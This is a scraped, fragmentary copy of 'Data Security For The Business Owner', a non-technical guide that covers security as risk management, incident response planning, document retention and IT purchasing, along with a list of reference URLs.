Carnegie Mellon Software Engineering Institute. Pittsburgh, PA 15213-3890. April 2003. Copyright © 2003
Carnegie Mellon University.
Thanks to Bruno Vernay for the CSS template I started from for the HTML version. Many thanks to the
folks at OASIS and everyone else who makes DocBook a wonderful tool.
86
http://www.goodwinprocter.com/getfile.aspx?filepath=/Files/publications/solecki_rosenberg_11_04.pdf
87
http://redtape.msnbc.com
88
http://redtape.msnbc.com/2006/06/one_year_ago_ha.html
89
http://eprint.iacr.org/2007/120
90
http://www.tweakers.net
91
http://tweakers.net/reviews/683
92
http://aspe.hhs.gov/admnsimp/pl104191.htm
93
http://www.computerworld.com
94
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9014782
95
http://www.computerworld.com.au
96
http://www.computerworld.com.au/index.php/id;838771320;fp;16;fpid;0
97
98
http://news.bbc.co.uk/2/hi/business/6298641.stm
99
http://www.cert.org/archive/pdf/csirt-handbook.pdf
67

Data Security For The Business Owner

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Data Security For The Business Owner

Uploaded by

Copyright:

Available Formats

Data Security For the Business Owner

How and Why for non-IT Professionals

Eric Vought <evought@pobox.com>

Exploits and Vulnerabilities ........................................................................................ 13

• explains security in terms of risk-management,

• reports on the current state of the Internet,

• describes fundamental security concepts in concrete, non-technical terms,

• develops basic data security strategies from first principles,

"Real World" Risks

Keeping People Out

Screening and Trust

Insurance Policies Mitigate Loss

Data Security Is Also Risk Based

Cybercrime and the State of the Internet

The Goals of Internet Criminals

• Embezzlement, insider trading, or other stock fraud.

Things Are Not Hopeless

Secure the Perimiter

Guard Your Secrets

Create a Defense In Depth

Security By Obscurity Is Not Effective

Exploits and Vulnerabilities

Keep Your Eyes Open

Building a Data Security Strategy

COBIT® IT Maturity Model

1: Initial Processes are ad-hoc and disorganized.

2: Repeatable Processes follow a regular pattern.

3: Defined Processes are documented and communicated.

4: Managed Processes are measured and monitored.

5: Optimised Good practices are followed, automated, and steadily adjusted.

As businesses are becoming overwhelmingly committed to electronic documents, essentially all of a

Document Retention and Protection

• to have restricted access,

• to be retained or deleted on a schedule,

• to be protected when sent over the Internet,

• to be protected from tampering or alteration,

• to have notarization or proof of service

Documentation, Policies, Audits— How Much, How

At a minimum for a small setup:

• Document the hardware, software, and versions on each system.

Larger Setups and Standards Compliance

• milestones to measure progress and plan improvement

• preparation for future regulatory changes

• Physical security to prevent direct access to critical systems and information.

[Isf-2005a SM1.2, Itgi-2005 pp 119-122, Dhhs-2003, PciSsc-2006]

An Incident Response Plan

A security incident may take many forms:

• An attempted network or computer break-in.

• A successful computer or network break-in.

• A virus or malware infection.

• Missing (lost or stolen) media or hardware.

• Unauthorized access to documents or data by an employee, vendor, or third party.

When a security incident is discovered, there are three immediate goals:

• Do we need to make a public statement or control negative publicity?

• Report software vulnerabilities.

• Obtain technical support.

• Help track or apprehend the criminal.

• Obtain outside review of proposed solutions.

Making IT and Security Purchases

• Use a defense in depth; do not bet everything on one product.

Simple, Proven, Standard

Specifications which are encumbered by intellectual property licenses, non-compete agreements, or

Second, without interoperability, a monoculture may develop. A monoculture is a situation where